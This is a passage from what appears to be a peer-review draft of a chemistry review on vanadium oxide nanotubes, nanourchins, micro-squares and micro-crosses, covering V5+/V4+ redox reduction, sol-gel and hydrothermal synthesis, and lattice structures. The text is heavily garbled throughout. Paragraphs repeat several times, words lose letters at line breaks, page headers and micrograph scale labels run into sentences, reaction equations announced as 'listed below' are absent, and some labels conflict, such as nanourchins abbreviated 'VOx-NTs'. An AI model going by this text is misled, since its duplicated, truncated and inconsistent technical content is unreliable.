3+ , and, frequently, V 4+ /V 5+ and V 4+ /V 3+ mixed oxidation states are obtained in the final product [36][37][38]. These reactions are also associated with the valence, which usually coincides with the oxidation states in the structural lattice. Zabalij et al. [39] conducted a comprehensive study in vanadium oxides focusing on the V ion polyhedral coordination in open extended networks, where the vanadium oxidation state can adopt many coordination polyhedrons with the oxygen atoms, ranging from octahedrons (O), tetrahedrons (T), and trigonal bipyramids (TB), which also exhibit two variants: TB type I and TB type II square pyramids (SP), distorted octahedrons (O), and rectilinear octahedrons (RO) (tetra-, penta-and hexa-coordination), respectively. This wide polyhedron coordination spectrum originates from its unique and bountiful structural chemistry; Figure 1 shows the V ion oscillation from tetrahedron to other polyhedrons with penta-and hexa-coordination.
Reactions 2023, 4, FOR PEER REVIEW with secondary and tertiary amines have also been employed [26,27], improving the o tention of different vanadium oxide networks, mainly layered hybrid organic-inorgan intercalation compounds, referred to as organic-inorganic layered composites with nov physical chemical properties. These vanadium oxide layers usually interact under coo erative van der Waals forces [28], mainly the vanadyl bond (V = O) and the amine fun tional group [29]; the most frequent interactions are with hydrogen bonds and ion-dipo forces; these interactions generate different degrees of partial reduction, depending on th amphiphilic functional group [30][31][32][33]. Vanadium oxide chemistry is based on shifting th vanadium atom's highest oxidation state to lower ones [34]; the partial reduction ofte yields mixed oxidation states [35]. The redox reactions performed to obtain differe nanostructures are applied to various vanadium oxide (V 5+ ) precursors; the reduction pr ceeds to V 4+ and V 3+ , and, frequently, V 4+ /V 5+ and V 4+ /V 3+ mixed oxidation states are o tained in the final product [36][37][38]. These reactions are also associated with the valenc which usually coincides with the oxidation states in the structural lattice. Zabalij et al. [3 conducted a comprehensive study in vanadium oxides focusing on the V ion polyhedr coordination in open extended networks, where the vanadium oxidation state can ado many coordination polyhedrons with the oxygen atoms, ranging from octahedrons (O tetrahedrons (T), and trigonal bipyramids (TB), which also exhibit two variants: TB type and TB type II square pyramids (SP), distorted octahedrons (O), and rectilinear octah drons (RO) (tetra-, penta-and hexa-coordination), respectively. This wide polyhedron c ordination spectrum originates from its unique and bountiful structural chemistry; Figu 1 shows the V ion oscillation from tetrahedron to other polyhedrons with penta-and hex coordination. The scheme exhibits a graphical correlation between the vanadium ion oxidatio state adopting a preferential coordination polyhedron. For example, the V 5+ cation is on located in the tetrahedron polyhedron but also can incorporate the trigonal bipyrami square pyramid, and distorted octahedra; on the other hand, the V 4+ cation appears in th trigonal bipyramid, square pyramid, and distorted octahedra, while the V 3+ cation The scheme exhibits a graphical correlation between the vanadium ion oxidation state adopting a preferential coordination polyhedron. For example, the V 5+ cation is only located in the tetrahedron polyhedron but also can incorporate the trigonal bipyramid, square pyramid, and distorted octahedra; on the other hand, the V 4+ cation appears in the trigonal bipyramid, square pyramid, and distorted octahedra, while the V 3+ cation is found solely in the rectilinear octahedra polyhedron. The vanadyl bond (V = O) [40] appears in most of the polyhedrons; the only exception is the rectilinear octahedra. Vanadium oxide structural networks are considered to be composed of bonded polyhedrons [41], where chains are created and connected with each other forming 2D (bidimensional) layers (habitually named sheets) to originate different 3D (tridimensional) networks following the path: polyhedron → chain → layer → tridimensional red; the middle links in the sequence are stablished as building blocks [42]; therefore, any vanadium oxide network can be defined and classified by the polyhedrons that it is made from. This is the reason that V 2 O 5 is described as a shape-shifter, because, once it faces reduction, the V 5+ ion coordination changes and a new structural red is obtained. As a result, this modular system material can be used to synthesize, characterize, and tailor-make numerous nano-and microstructures with novel morphologies [43][44][45][46]. The aqueous chemistry the V 5+ precursors confront under chemical parameters, such as pH, organic polar solvents, concentration, and other species (anions from the V 5+ precursor), affect the fashion mode in which the polyhedrons are bonded, influencing the building blocks to create different vanadium oxide networks [47].
Livage., [48] reviewed the condensation reactions that arise at higher concentrations from the aqueous V 5+ octahedra precursor, two types of reactions co-exist olation and oxolation, both reactions are pH reliant and involve hydroxyl and water molecules under nucleophilic addition processes and only take place along the xy planes, both reactions are listed below: Unfortunately, these reactions do not consider physical parameters, such as temperature and pressure, and chemical parameters such as intercalated guest species, including long alkyl chain surfactants displaying primary monoamines, thiols, and carboxylic acids (C n H (2n+1) NH 2 , C n H (2n+1) SH, and C (n−1) H (2n+1) COOH) organic functional groups [49,50], solvent mixtures with different polarity degrees, and host-guest stoichiometry [51]. The redox reactions will therefore play a major role under hydrothermal treatment [52], where new structural lattices will be formed, depending on the reduction ratio obtained, which will vary in every synthesis [53].
There is a flexible, layered structural host lattice obtained under hydrothermal treatment from different V 5+ precursors, which displays a V 4+ /V 5+ mixed oxidation state with different ratios, made of tetrahedral and distorted octahedral/square pyramid mixed valence. This is the main framework of many nano-and microstructures (for example, vanadium oxide nanotubes (VOx-NTs), urchins (VOx-NU), bricks and squares (VOx-MSQ), etc.). This lattice is known as vanadium bronze-V 7 plane; in-between the layers, the Ba 2+ cations and water molecules are intercalated; the structure is made of zig-zag chain trimers consisting of distorted octahedral-coordinated V(1)O 6 -V(2)O 6 -V(1)O 6 shared-edge atoms; the layer is created when the chain links with other neighboring zig-zag chains by sharing one oxygen atom between the V(1)O 6 --V(1)O 6 octahedral sites. These layers link by sharing common edges, where the octahedral coordination is achieved between the V(1) site from the upper layer bonding with one oxygen from the V(2) site from the lower layer, where all the vanadyl bonds are pointing up in the top layer and down in the lower one. Both the distorted octahedral layers are connected with a V(3)O 4 site exhibiting tetrahedral coordination between the V(1)O 6 -V(2)O 6 sites in each layer. While the V 4+ and V 5+ cations occupy the V(1)O 6 and V(2)O 6 sites, the V 5+ has a V(1)O 6 site preference, due to a lower symmetry; the lattice has a tetragonal unit cell with red parameters: a = 6.1598 Å, c = 21.522 Å. The structure has been used to simulate the VOx-NTs framework in tetragonal and triclinic modifications [55].
Hellmann et al. [56] proposed another [V 7 O 16 ] structural lattice for tubular morphologies, where the octahedral coordination trimers made of V(1)O 5 -V(2)O 5 -V(1)O 5 atoms from the zig-zag chains in the double layers are heavily elongated, adopting predominantly a square pyramidal VO 5 coordination. The lattice has a quasi-tetragonal unit cell with red parameters a ≈ 6.0 Å, and the length of the c axis is determined by the self-assembled, intercalated, long alkyl chain, primary or diamine, between the layers of the stacked V 7 O 16 framework. There are many structural models based on this structural lattice related to VOx-NTs walls [57].
This review focuses on analyzing qualitatively the possible redox reactions at the early stage intercalation sol-gel processes, throughout the hydrothermal treatment that could take place in the different vanadium oxide nano-and microstructures, such as vanadium oxide nanotubes (VOx-NTs), nanourchins (VOx-NU), micro-squares and crosses (VOx-MSQ and VO 2 -MC), nano six-folds (cogs) and nano star-fruits (VOx-NC and VO 2 -NSF), exhibiting different degrees of reduction, ranging from mixed oxidation state V 4+ /V 5+ ratios, V 5+ complete reduction to V 4+ , and mixed oxidation V 3+ /V 4+ ratios, which are associated with different mixed-valence structural lattices, in which V 7 O 16 2− , VO 2 , and V 6 O 11 are obtained, as well as the specific morphology, shape, size distribution, and surface defects, etc., in addition to some approaches to regulate the mixed oxidation V 4+ /V 5+ ratio under soft chemical processes.
Materials and Methods
The V 5+ precursors used are V 2 O 5 , VOCl 3 , VO(OCH(CH 3 ) 2 ) 3 , NH 4 VO 3 , and Xerogel V 2 O 5 •1.5 H 2 O. The most common surfactants employed are mainly long alkyl chain primary mono amines, long alkyl chain thiols, and Pluronic copolymer. The following ( Table 1) exhibits some of the synthetic procedures, including some V 5+ precursors, the surfactants, and the corresponding structural lattice obtained after hydrothermal treatment. [67] 123 Pluronic V 7 O 16 2− Figure 2 exhibits a scheme sequencing the steps taken to synthesize vanadium oxide nanourchins, which can be applied to nanotubes, squares, and six-folds cogs.
Reactions 2023, 4, FOR PEER REVIEW 5 Figure 2. Synthetic procedure to obtain vanadium oxide nanourchins, (VOx-NU), using VO(OCH(CH3)2)3 V 5+ precursor and 1-octadecylamine in a sol-gel process enhanced with hydrothermal treatment, where V 5+ reduces 46.0% into V 4+ , morphing from V2O5 to V7O16 2− structural lattice. Table 2 exhibits the V 4+ percentage obtained when the hydrothermal treatment is performed in each synthesis; the reduction is approximately 50.0% in V 4+ VOx-NTs and VOx-NU, 75.0% for squares and bricks (VOx-MSQ), a complete reduction from V 5+ to V 4+ for Synthetic procedure to obtain vanadium oxide nanourchins, (VOx-NU), using VO(OCH(CH 3 ) 2 ) 3 V 5+ precursor and 1-octadecylamine in a sol-gel process enhanced with hydrothermal treatment, where V 5+ reduces 46.0% into V 4+ , morphing from V 2 O 5 to V 7 O 16 2− structural lattice. Table 2 exhibits the V 4+ percentage obtained when the hydrothermal treatment is performed in each synthesis; the reduction is approximately 50.0% in V 4+ VOx-NTs and VOx-NU, 75.0% for squares and bricks (VOx-MSQ), a complete reduction from V 5+ to V 4+ for VOx-MC and VOx-NSF, and sometimes even further to V 3+ in VOx-NC. Vanadium oxide nanotubes (often exhibiting micrometric lengths, containing nanometric inner and outer diameters) are synthesized using different vanadium (V) precursors and techniques. For example, V 2 O 5 , NH 4 VO 3 , VOCl 3 , vanadium (V) oxytriisopropoxide, and V 2 O 5 •H 2 O xerogel are directed, with long chain alkyl amines as surfactants, under a sol-gel technique. The first one works straightforwardly as a host lattice to allow guest species to be intercalated, and the others are treated under acid hydrolysis and condensation reactions in order to form the V 2 O 5 host lattice in the presence of long-chain alkyl amines. Some of these precursors will be analyzed below in other microstructures; for example, the VOCl 3 precursor reacts with water and is directed with long alkyl chain amines; the mixture is buffered with CH 3 COONa/CH 3 COOH solution to maintain the pH below 7.0 to produce the layered organic-inorganic nanocomposite; the reduction process is insignificant; and the protonated RNH 3 + monoamines are intercalated in-between the vanadium oxide layers. The hydrolysis and condensation sol-gel reactions are listed below:
Results
Hydrolysis Reactions 2023, 4 6 The intermolecular forces display a major role in the intercalation processes; the amines are protonated if the pH medium is lower than 7.0 at room temperature. The ion-dipole and dipole-dipole interactions with the vanadyl bond from the host lattice, and the cooperative hydrogen bond interactions between RN-H-O = V, are crucial; on the other hand, the London forces between the hydrophobic hydrocarbon chains allow the establishment of a self-assembled layered RNH 3 + -V 2 O 5 composite, preventing the reduction process from progressing significantly, even though some undersized V 5+ reduction to V 4+ proceed. The inorganic V 2 O 5 lattice acts like an oxidant agent, accepting electrons and decreasing the vanadium atom oxidation state, while the long alkyl chain primary amine responds as the reducing agent, losing electrons and increasing the number of oxygen atoms in the functional primary amine by replacing a hydrogen atom for a hydroxyl. This can be summarized in the next redox reaction, assuming the structural lattice is V 2 O 5 and 1-octadecylamine is the surfactant.
Hydrothermal treatment at 180 • C for seven days yields VOx-NTs; the reduction process exhibits the V 4+ /V 5+ rate content of 0.85, approximately (46.0% V 4+ and 54.0% V 5+ ), the weighted oxidation state responds to 4.54+ (V 4.54+ ). Therefore, a mixed oxidationstate vanadium oxide lattice is formed; in these nanotubes, the self-assembled long alkyl chain primary amines are still embedded (intercalated) inside the vanadium oxide layers; therefore, the intermolecular forces previously mentioned are once again responsible for preventing a complete reduction from V 5+ to V 4+ . The flexible host lattice rolls up, acquiring the nanotube morphology ((C n H (2n+1) NH 3 ) 2 V 7 O 16 with 3 < n < 21). The transmission electron micrographs in Figure 3 illustrate the morphology; the tubular walls of the VOx-NTs are composed of a (C n H (2n+1) NH 3 ) 2 V 7 O 16 layered framework made of zig-zag chains, consisting of square pyramids that shares their edges, whereas the V(2)O 5 site is surrounded by two V(1)O 5 sites, generating a trimer which is connected with another chain by sharing an oxygen atom creating a layer where all the vanadyl bonds are pointing up in the pyramid apex direction. This layer is connected with another one featuring the same structure, pointing in the opposite direction, by sharing a tetrahedral V(3)O 4 site in-between them, conferring on the framework some robustness and flexibility; the red triclinic unit cell parameters are a = 6.16 Å, b = 6.17 Å, and c = 19.1 Å, with α = 96.14 • , β = 92.82 • , and γ = 90.07 • [68]. The V 4+ = O vanadyl bond has been reported as being localized in the tetrahedral V(3)O 4 sites [69]. The buffer CH 3 COONa/CH 3 COOH and chloride anions must be removed before the hydrothermal treatment; otherwise, it will interact with the embedded amines during the reaction at 180 • C, causing the self-assembled amines to displace from the host lattice, which facilitates a further reduction that could result in V 4+ . A simple reaction is listed below (using 1-octadecylamine (ODA)): [70,71]. Even though the same stoichiometry is used 2:1 (alkoxide: long alkyl chain primary monoamine), the quantity and solvent ratios employed in the synthesis are different; therefore, the surfactants' arrangement in this solvent:medium ratio might explain the morphology of the high-density, nanotubes radial array spherical clusters; the sol-gel process is directed by long alkyl chain primary monoamines, for example, 1-hexadecylamine, 1-dodecylamine, and 1-octadecylamine. The synthesis is performed under inert atmospheric conditions (Argon environment) in a solvent ethanol/water mixture medium. In the obtention of a layered intercalation inorganic-organic compound, where the long alkyl chain primary amines are intercalated in a self-assembled configu-ration in-between the layers of a V 2 O 5 host lattice, the process is concealed by the same intermolecular interactions explained previously in VOx-NTs, the sol-gel hydrolysis and condensation reactions are listed below.
Vanadium Oxide ((CnH(2n+1)NH3)2V7O16 Nanourchins (VOx-NU)
Vanadium oxide nanourchins (VOx-NTs) are synthesized using the same alkoxide synthetic route as VOx-NTs. O'Dwyer and Roppolo et al. used the V 5+ precursor VO(CH(CH3)2)3 [70,71]. Even though the same stoichiometry is used 2:1 (alkoxide: long alkyl chain primary monoamine), the quantity and solvent ratios employed in the synthesis are different; therefore, the surfactants' arrangement in this solvent:medium ratio might explain the morphology of the high-density, nanotubes radial array spherical clusters; the sol-gel process is directed by long alkyl chain primary monoamines, for example, 1-hexadecylamine, 1-dodecylamine, and 1-octadecylamine. The synthesis is performed under inert atmospheric conditions (Argon environment) in a solvent ethanol/water mixture medium. In the obtention of a layered intercalation inorganic-organic compound, where the long alkyl chain primary amines are intercalated in a self-assembled configuration in-between the layers of a V2O5 host lattice, the process is concealed by the same intermolecular interactions explained previously in VOx-NTs, the sol-gel hydrolysis and condensation reactions are listed below. Hydrolysis Condensation 1
Vanadium Oxide ((CnH(2n+1)NH3)2V7O16 Nanourchins (VOx-NU)
Vanadium oxide nanourchins (VOx-NTs) are synthesized using the same alkoxide synthetic route as VOx-NTs. O'Dwyer and Roppolo et al. used the V 5+ precursor VO(CH(CH3)2)3 [70,71]. Even though the same stoichiometry is used 2:1 (alkoxide: long alkyl chain primary monoamine), the quantity and solvent ratios employed in the synthesis are different; therefore, the surfactants' arrangement in this solvent:medium ratio might explain the morphology of the high-density, nanotubes radial array spherical clusters; the sol-gel process is directed by long alkyl chain primary monoamines, for example, 1-hexadecylamine, 1-dodecylamine, and 1-octadecylamine. The synthesis is performed under inert atmospheric conditions (Argon environment) in a solvent ethanol/water mixture medium. In the obtention of a layered intercalation inorganic-organic compound, where the long alkyl chain primary amines are intercalated in a self-assembled configuration in-between the layers of a V2O5 host lattice, the process is concealed by the same intermolecular interactions explained previously in VOx-NTs, the sol-gel hydrolysis and condensation reactions are listed below. Hydrolysis Condensation 1
Condensation 2
Reactions 2023, 4 The inorganic-organic layered intercalation compound features a minor reduction process at room temperature from V 5+ to V 4+ , where the V2O5 host displays an oxidant agent role and the long alkyl chain primary monoamines a reducing agent role; the intermolecular interactions prevent a major reduction degree taking place. The next redox reaction exhibits this process.
The hydrothermal treatment at 180 °C over seven days creates the nanourchin spherical clusters. In this process, many different reactions take place; the V 5+ to V 4+ reduction is significant and ranges from 46 to 50% (the weighted oxidation state is V 4.54+ and V 4.5+ ); the temperature and pressure might be key factors transitioning the structural lattice from V2O5 to V7O16 2− ; and the inorganic-organic layered intercalation compound retains the self-assembled long alkyl chain primary amines inside the V7O16 2− layers ((CnH(2n+1)NH3)2V7O16 with 11 < n < 19). Therefore, the intermolecular interactions are controlling the V 4+ /V 5+ ratio from 0.85 to 1.0. The morphology displays a tubular configuration, which is also self-assembled in spherical clusters. The structural lattice is the same framework studied previously on the vanadium oxide nanotubes; the redox reaction below exhibits this process, assuming the long alkyl chain primary monoamines (1-hexadecylamine (HDA)) are acting as reducing agents.
Perera et al. [63] synthesized VOx-NU using 10 mmol V2O5 precursor with 10 mmol 1-hexadecylamine under strong agitation in 40 mL of deionized water for 48 h; the yellow suspension was Teflon-aligned under hydrothermal treatment for seven days, and spherical clusters with high-density nanotubes were obtained, in which the amines are intercalated in-between the V7O16 2− layers interacting under van der Waals forces. The next set of SEM micrographs in Figure 4 exhibits the spherical clusters (nanourchin-obtained) after hydrothermal treatment, which features the high-density nanotube radial arrays, for more detailed scanning electron micrographs see supplementary information Figure S1. (12) The inorganic-organic layered intercalation compound features a minor reduction process at room temperature from V 5+ to V 4+ , where the V 2 O 5 host displays an oxidant agent role and the long alkyl chain primary monoamines a reducing agent role; the intermolecular interactions prevent a major reduction degree taking place. The next redox reaction exhibits this process. (13) The hydrothermal treatment at 180 • C over seven days creates the nanourchin spherical clusters. In this process, many different reactions take place; the V 5+ to V 4+ reduction is significant and ranges from 46 to 50% (the weighted oxidation state is V 4.54+ and V 4.5+ ); the temperature and pressure might be key factors transitioning the structural lattice from V 2 O 5 to V 7 O 16 2− ; and the inorganic-organic layered intercalation compound retains the self-assembled long alkyl chain primary amines inside the V 7 O 16 2− layers ((C n H (2n+1) NH 3 ) 2 V 7 O 16 with 11 < n < 19). Therefore, the intermolecular interactions are controlling the V 4+ /V 5+ ratio from 0.85 to 1.0. The morphology displays a tubular configuration, which is also self-assembled in spherical clusters. The structural lattice is the same framework studied previously on the vanadium oxide nanotubes; the redox reaction below exhibits this process, assuming the long alkyl chain primary monoamines (1-hexadecylamine (HDA)) are acting as reducing agents.
Perera et al. [63] synthesized VOx-NU using 10 mmol V 2 O 5 precursor with 10 mmol 1-hexadecylamine under strong agitation in 40 mL of deionized water for 48 h; the yellow suspension was Teflon-aligned under hydrothermal treatment for seven days, and spherical clusters with high-density nanotubes were obtained, in which the amines are intercalated in-between the V 7 O 16 2− layers interacting under van der Waals forces. The next set of SEM micrographs in Figure 4 exhibits the spherical clusters (nanourchin-obtained) after hydrothermal treatment, which features the high-density nanotube radial arrays, for more detailed scanning electron micrographs see supplementary information Figure S1 Vanadium oxide micro-squares VOx-MSQ ((NH 4 ) 2 V 7 O 16 ) were obtained by Navas et al. [64], featuring the V 7 O 16 2− structural lattice of BaV 7 O 16 •nH 2 O (a tetragonal unit cell with red parameters a ≈ 0.617 and c = 21.522 Å) made of double, upper and lower layers of zig-zag chains, which are interconnected with other zig-zag chains by sharing one oxygen atom. Each chain consists of distorted octahedral VO 6 trimers (occurring when the V(1) site from the upper layer coordinates with an oxygen atom of the V(2) site from the lower layer, if both layers are close enough). These are linked with a V(3)O 4 site with tetrahedral coordination located in-between the layers, which generates the final stacked layered framework, where the ammonia polycation is intercalated. The rolling process is suppressed throughout the hydrothermal treatment; therefore, no tubular morphology arises. Nevertheless, a square morphology is obtained; the synthesis employs ammonium metavanadate (NH 4 VO 3 ) as the V 5+ precursor and 1-hexadecylamine as the amphipathic organic template; the stoichiometry (NH 4 VO 3 : 1-hexadecylamine) used is 2:1; the pH is adjusted using CH 3 COOH (acetic acid) in a CH 3 CH 2 OH/H 2 O solvent mixture to facilitate the sol-gel process, even though the aqueous vanadate reactions are extensive and intricate. An abbreviated reaction is exhibited below: The V 5+ (NH 4 VO 3 ) precursor reacts with acetic acid and water; the orange color suspension of the decavanadate polyanion (V 10 O 28 6− ) is obtained; it consists of ten edgesharing VO 6 octahedra, which act as building-block clusters at pH < 2.0, precipitating as a layered organic-inorganic intercalation compound made of V 2 O 5 host lattice-containing, intercalated, self-assembled long alkyl chain primary monoamines guests; both reactions are listed below.
The formation of the structural lattice could be conducted under two reactions, hydrolysis and condensation, because the pH reduces the coordination increases; therefore, the reaction could be represented below.
Vanadium Oxide (NH4)2V7O16 Micro-Squares (VOx-MSQ) and VO2 Micro-Crosses (VOx-MC)
Vanadium oxide micro-squares VOx-MSQ ((NH4)2V7O16) were obtained by Navas et al. [64], featuring the V7O16 2− structural lattice of BaV7O16 • nH2O (a tetragonal unit cell with red parameters a ≈ 0.617 and c = 21.522 Å) made of double, upper and lower layers of zig-zag chains, which are interconnected with other zig-zag chains by sharing one oxygen atom. Each chain consists of distorted octahedral VO6 trimers (occurring when the V(1) site from the upper layer coordinates with an oxygen atom of the V(2) site from the lower layer, if both layers are close enough). These are linked with a V(3)O4 site with tetrahedral coordination located in-between the layers, which generates the final stacked layered framework, where the ammonia polycation is intercalated. The rolling process is suppressed throughout the hydrothermal treatment; therefore, no tubular morphology arises. Nevertheless, a square morphology is obtained; the synthesis employs ammonium metavanadate (NH4VO3) as the V 5+ precursor and 1-hexadecylamine as the amphipathic organic template; the stoichiometry (NH4VO3: 1-hexadecylamine) used is 2:1; the pH is
Hydrolysis
Reactions 2023, 4, FOR PEER REVIEW 10 Ethanol might also have taken part in the hydrolysis reactions; for example, if 3 mol of ethanol had interexchanged with 3 mol of acetate polyanion, this might accelerate this process: (19) Ethanol might also have taken part in the hydrolysis reactions; for example, if 3 mol of ethanol had interexchanged with 3 mol of acetate polyanion, this might accelerate this process: Ethanol might also have taken part in the hydrolysis reactions; for example, if 3 mol of ethanol had interexchanged with 3 mol of acetate polyanion, this might accelerate this process: The same process might also take place simultaneously, involving the ethanolic precursors: Hydrolysis Ethanol might also have taken part in the hydrolysis reactions; for example, if 3 mol of ethanol had interexchanged with 3 mol of acetate polyanion, this might accelerate this process: The same process might also take place simultaneously, involving the ethanolic precursors:
Condensation
Hydrolysis Ethanol might also have taken part in the hydrolysis reactions; for example, if 3 mol of ethanol had interexchanged with 3 mol of acetate polyanion, this might accelerate this process: The same process might also take place simultaneously, involving the ethanolic precursors: Ethanol might also have taken part in the hydrolysis reactions; for example, if 3 mol of ethanol had interexchanged with 3 mol of acetate polyanion, this might accelerate this process: The same process might also take place simultaneously, involving the ethanolic precursors: The same process might also take place simultaneously, involving the ethanolic precursors: Ethanol might also have taken part in the hydrolysis reactions; for example, if 3 mol of ethanol had interexchanged with 3 mol of acetate polyanion, this might accelerate this process: The same process might also take place simultaneously, involving the ethanolic precursors: Reactions 2023, 4, FOR PEER REVIEW 11 At room temperature, the sol-gel process does not generate a major degree of reduction from V 5+ to V 4+ , and intermolecular forces prevent the reduction taking place as reviewed in the previous V7O16 structures. The layered inorganic-organic intercalation compound remains stable; the long alkyl chain amine protonation (C16H33NH3 + conjugated acid) with acetic acid at a lower pH generates an exchange reaction. The NH4 + polycations are replaced with C16H33NH3 + inside the host lattice by reacting with acetate (CH3COO ̅ At room temperature, the sol-gel process does not generate a major degree of reduction from V 5+ to V 4+ , and intermolecular forces prevent the reduction taking place as reviewed in the previous V 7 O 16 structures. The layered inorganic-organic intercalation compound remains stable; the long alkyl chain amine protonation (C 16 H 33 NH 3 + conjugated acid) with acetic acid at a lower pH generates an exchange reaction. The NH 4 + polycations are replaced with C 16 H 33 NH 3 + inside the host lattice by reacting with acetate (CH 3 COO − conjugated base), forming the neutral CH 3 COONH 4 . The acid-base set of reactions are described below.
The reduction process in the V 4+ content is 73.0% in VOx-MSQ after hydrothermal treatment is performed at 180 • C. There are many factors involved: the disintercalation from the self-assembled long alkyl chain primary monoamines; the concentrated acetic acid playing a fundamental role as a reductant agent, and also reacting with the long alkyl chain primary monoamines creating long alkyl chain secondary monoamides; the structural lattice V 7 O 16 2− hosts the remaining NH 4 + polycations to neutralize the negative charge under intercalation; therefore, the rolling effect is hindered, and the tubular morphology is missing. Instead, the flat squared morphology made of stacked pillared intercalated (NH 4 ) 2 V 7 O 16 layered composite is obtained. Even though some intermolecular forces are still present, the London forces between the carbon long alkyl chains from the primary monoamines are absent; the interlayer distance is shortened, blocking the rolling process, and allowing the reduction to increase. The cooperative hydrogen bonds and ion-dipole interactions between the ammonium polycations with the vanadyl bonds from the V 7 O 16 2− lattice prevent the entire reduction to VO 2 ; the V 4+ /V 5+ ratio is 2.745 (73.3% V 4+ and 26.7% V 5+ ). The quantification was performed using a calibrated permanganometric titration; the weighted oxidation state was 4.267+ (V 4.267+ ), similar to BaV 7 O 16 •nH 2 O structure, which reported a 4.29+ (V 4.29+ ) weighted oxidation state (71.0% V 4+ and 29.0% V 5+ , with a V 4+ /V 5+ ratio of 2.45). The next set of reactions exhibits this redox process and the long alkyl chain primary monoamines disintercalation: The SEM and TEM micrographs from the (NH 4 ) 2 V 7 O 16 are exhibited below in Figures 5 and 6, which feature the micrometric square morphology.
Wang et al. [65] reported the same synthesis previously described, modifying the amount of water used, and increased the aging time up to five days. The hydrothermal treatment was performed at 180 • C over five consecutive days; the VOx-MSQ ((NH 4 ) 2 V 7 O 16 •3H 2 O) displays the same square morphology; the V 4+ /V 5+ ratio is 2.448, which responds to a weighted oxidation state of 4.29+ (V 4.29+ ) distributed between 71.0% V 4+ and 29.0% V 5+ . The structure differs from its predecessor on the red lattice parameters, where the unit cell is triclinic (a = 6. Wang et al., [65] reported the same synthesis previously described, modifying the amount of water used, and increased the aging time up to five days., The hydrothermal treatment was performed at 180 °C over five consecutive days; the VOx-MSQ ((NH4)2V7O16 • 3H2O) displays the same square morphology; the V 4+ /V 5+ ratio is 2.448, which responds to a weighted oxidation state of 4.29+ (V 4.29+ ) distributed between 71.0% V 4+ and 29.0% V 5+ . The structure differs from its predecessor on the red lattice parameters, where the unit cell is triclinic (a = 6.1008 Å, b = 12.1826 Å, and c = 17.8954 Å, with α = 88.8205°, β = 84.0988°, and γ = 89.8291°) and is made of double upper and lower layers of zig-zag chains that are interconnected by sharing one oxygen atom with the V(1)O5 sites. Each chain consists of square pyramid VO5 trimers displaying V(1)O5-V(2)O5-V(1)O5 edge-sharing modes (the elongated octahedral coordination is excessively far between the sites V(1)O5 from the upper and V(2)O5 from the lower layers); the layers are linked via the V(3)O4 site, with tetrahedral coordination in-between the layers that generates the final, stacked layered framework where the ammonia polycation is intercalated.
Vanadium oxide micro-crosses (VOx-MC) are obtained when hydrothermal treatment is performed for longer periods of time (over 10 days); the reducing agent, acetic 0.5 µm 0.5 µm 2 µm 2 µm 1 µm 1 µm Wang et al., [65] reported the same synthesis previously described, modifying the amount of water used, and increased the aging time up to five days., The hydrothermal treatment was performed at 180 °C over five consecutive days; the VOx-MSQ ((NH4)2V7O16 • 3H2O) displays the same square morphology; the V 4+ /V 5+ ratio is 2.448, which responds to a weighted oxidation state of 4.29+ (V 4.29+ ) distributed between 71.0% V 4+ and 29.0% V 5+ . The structure differs from its predecessor on the red lattice parameters, where the unit cell is triclinic (a = 6.1008 Å, b = 12.1826 Å, and c = 17.8954 Å, with α = 88.8205°, β = 84.0988°, and γ = 89.8291°) and is made of double upper and lower layers of zig-zag chains that are interconnected by sharing one oxygen atom with the V(1)O5 sites. Each chain consists of square pyramid VO5 trimers displaying V(1)O5-V(2)O5-V(1)O5 edge-sharing modes (the elongated octahedral coordination is excessively far between the sites V(1)O5 from the upper and V(2)O5 from the lower layers); the layers are linked via the V(3)O4 site, with tetrahedral coordination in-between the layers that generates the final, stacked layered framework where the ammonia polycation is intercalated.
Vanadium oxide micro-crosses (VOx-MC) are obtained when hydrothermal treatment is performed for longer periods of time (over 10 days); the reducing agent, acetic 0.5 µm 0.5 µm 2 µm 2 µm 1 µm 1 µm Vanadium oxide micro-crosses (VOx-MC) are obtained when hydrothermal treatment is performed for longer periods of time (over 10 days); the reducing agent, acetic acid, reduces the V 7 O 16 2− oxidant agent entirely into the VO 2 structural lattice; the vanadium atom oxidation state is 4+ (V 4+ ); the disintercalation of the NH 4 + polycations is achieved to create ammonium acetate. Therefore, without any intermolecular forces, a complete reduction from V 5+ to V 4+ is achieved; the square to cross morphology transformation suggests the (NH 4 ) 2 V 7 O 16 micro-squares have split in four symmetrical VO 2 folds; a possible redox reaction and the main NH 4 + disintercalation reactions are exhibited.
The next set of SEM micrographs in Figure 7 displays the VO 2 micro-cross (VOx-MC) morphology once the intercalation compound has been dismantled. The supporting information exhibits more detailed SEM and TEM micrographs of VOx-MC in Figures S2 and S3. complete reduction from V 5+ to V 4+ is achieved; the square to cross morphology transformation suggests the (NH4)2V7O16 micro-squares have split in four symmetrical VO2 folds; a possible redox reaction and the main NH4 + disintercalation reactions are exhibited.
The final reduction and formation of (enH2)2V7O16 is achieved by performing a hydrothermal treatment; the acetic acid concentration and protonated ethylenediamine will display the same NH4 + role previously observed in the (NH4)2V7O16; therefore, the acetic 4 , placed between these upper and lower layers; the protonated H 3 + NCH 2 CH 2 NH 3 + diamines are intercalated between the layered stacked framework. The synthesis suggests a layered intercalation compound, H 3 + NCH 2 CH 2 NH 3 + -V 2 O 5 , is formed during the sol-gel process; the intermolecular forces previously discussed are key factors in obtaining both the layered intercalation compound and the squared microstructure; the reaction exhibits the ethylene diamine protonation with acetic acid.
The final reduction and formation of (enH 2 ) 2 V 7 O 16 is achieved by performing a hydrothermal treatment; the acetic acid concentration and protonated ethylenediamine will display the same NH 4 + role previously observed in the (NH 4 ) 2 V 7 O 16 ; therefore, the acetic acid displays the reducing agent role to generate the mixed oxidation state, and the intercalated, protonated short-chain alkylamines will prevent the complete V 2 O 5 oxidant agent reduction. As the rolling effect is hindered, no tubular morphology is observed; the short length of the diamine is not enough to allow the nanotube formation; the 73.3% V 4+ and 26.7% V 5+ obtained gives the V 4+ /V 5+ ratio of 2.745, which is associated with a weighted oxidation state of 4.267+ (V 4.267+ ). The reaction exhibits the redox process performed: (En) 2 V 7 O 16 was previously reported by Worle et al. [72] unfortunately not in a pure phase. It was synthesized using the V 5+ VO(OCH(CH 3 ) 2 ) 3 precursor with ethylenediamine (H 2 NCH 2 CH 2 NH 2 ), using a 2:1 molar ratio in ethanol and hydrolyzed with water. After aging for a day, a hydrothermal treatment was executed for seven days at 180 • C; the synthesis suggests the same V 4+ should be obtained in comparison with the aforementioned (EnH 2 ) 2 V 7 O 16 . The structure has the same triclinic unit cell with red parameters: a = 6.16 Å, b = 6.17 Å, and c = 19.1 Å, with α = 96.14 • , β = 92.82 • , and γ = 90.07 • , and presents the structural features previously mentioned.
